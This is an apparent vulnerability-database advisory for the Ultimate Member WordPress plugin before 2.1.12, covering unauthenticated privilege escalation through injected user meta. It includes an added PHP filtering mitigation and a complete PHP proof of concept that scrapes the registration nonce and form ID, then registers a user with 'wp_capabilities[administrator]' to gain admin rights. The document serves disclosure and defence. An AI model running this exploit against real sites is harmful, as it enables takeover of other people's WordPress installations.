WordPress Plugin Vulnerabilities
Ultimate Member < 2.1.12 - Unauthenticated Privilege Escalation via User Meta
Description
An attacker could supply an array parameter for sensitive user meta such as wp_capabilities, the meta key that defines a user's role. During registration, the submitted details were passed to the update_profile function, and any metadata included in the submission, whatever its key, was written to the newly registered user. The request in the proof of concept therefore granted administrator access at registration time.
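An added hardening example, not Ultimate Member's own code and not part of this advisory, showing the check the description implies is missing: only fields declared for the registration form reach the profile update, and capability or user-level meta is never accepted from a registration request. The $form_fields list, the form_id value and the sample POST array are assumed.

```php
<?php
// Added mitigation example (hypothetical, not the plugin's code): sanitize the
// registration submission before any profile/meta update routine sees it.

function is_role_meta_key(string $key, string $prefix = 'wp_'): bool {
    // wp_capabilities and wp_user_level are stored under the database table
    // prefix, which is not always "wp_"; check the configured prefix and the default.
    foreach (array_unique([$prefix, 'wp_']) as $p) {
        if ($key === $p . 'capabilities' || $key === $p . 'user_level') {
            return true;
        }
    }
    return false;
}

function filter_registration_submission(array $post, array $form_fields, string $form_id, string $prefix = 'wp_'): array {
    $clean = [];
    foreach ($post as $key => $value) {
        if (is_role_meta_key($key, $prefix)) {
            continue; // role data must never be writable from a registration form
        }
        // Only declared form fields (named <field>-<form_id>) are passed on.
        $base = preg_replace('/-' . preg_quote($form_id, '/') . '$/', '', $key);
        if ($base === $key || !in_array($base, $form_fields, true)) {
            continue; // unknown or bare key: dropped
        }
        // Form fields are scalar; an array value (the PoC's trick) is rejected.
        if (!is_scalar($value)) {
            continue;
        }
        $clean[$base] = (string) $value;
    }
    return $clean;
}

// Constructed sample input mirroring the shape of the PoC request.
$form_id     = '123';
$form_fields = ['user_login', 'first_name', 'last_name', 'user_email',
                'user_password', 'confirm_user_password'];
$post = [
    'user_login-123'  => 'alice',
    'user_email-123'  => 'alice@example.test',
    'wp_capabilities' => ['administrator' => ''],
    'form_id'         => '123',
];
print_r(filter_registration_submission($post, $form_fields, $form_id));
```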
Proof of Concept
<?php
// Settings (taken from the command line)
$wp_url   = $argv[1];
$username = $argv[2];
$name     = $argv[3];
$lastname = $argv[4];
$email    = $argv[5];
$um_role  = $argv[6]; // read but not used by this PoC

// Pull the nonce from the registration page
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . '/register');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$content = curl_exec($ch);
curl_close($ch);
preg_match('/_wpnonce"\svalue="([^"]+)"/', $content, $matches);
$nonce = $matches[1];

// Pull the form_id (the page is fetched a second time, as in the original)
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . '/register');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$content = curl_exec($ch);
curl_close($ch);
preg_match('/id=\"form_id_([^"]+)"/', $content, $matches);
$form_id = $matches[1];

// Submit the registration form; the bare wp_capabilities array is the
// injected meta that update_profile writes for the new user
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . '/register');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
    'user_login-' . $form_id            => $username,
    'first_name-' . $form_id            => $name,
    'last_name-' . $form_id             => $lastname,
    'user_email-' . $form_id            => $email,
    'user_password-' . $form_id         => 'StrongPassword123!',
    'confirm_user_password-' . $form_id => 'StrongPassword123!',
    'wp_capabilities[administrator]'    => '',
    'form_id'                           => $form_id,
    'timestamp'                         => '1603399250',
    'um_request'                        => '',
    '_wpnonce'                          => $nonce,
    '_wp_http_referer'                  => 'register'
]);
$output = curl_exec($ch);
curl_close($ch);
print_r($output);
?>
Classification
Type
PRIVESC
Miscellaneous
Original Researcher
Chloe Chamberland
Submitter
Chloe Chamberland
Verified
No
Timeline
Publicly Published
2020-11-09 (about 3 years ago)
Added
2020-11-09 (about 3 years ago)
Last Updated
2021-01-06 (about 3 years ago)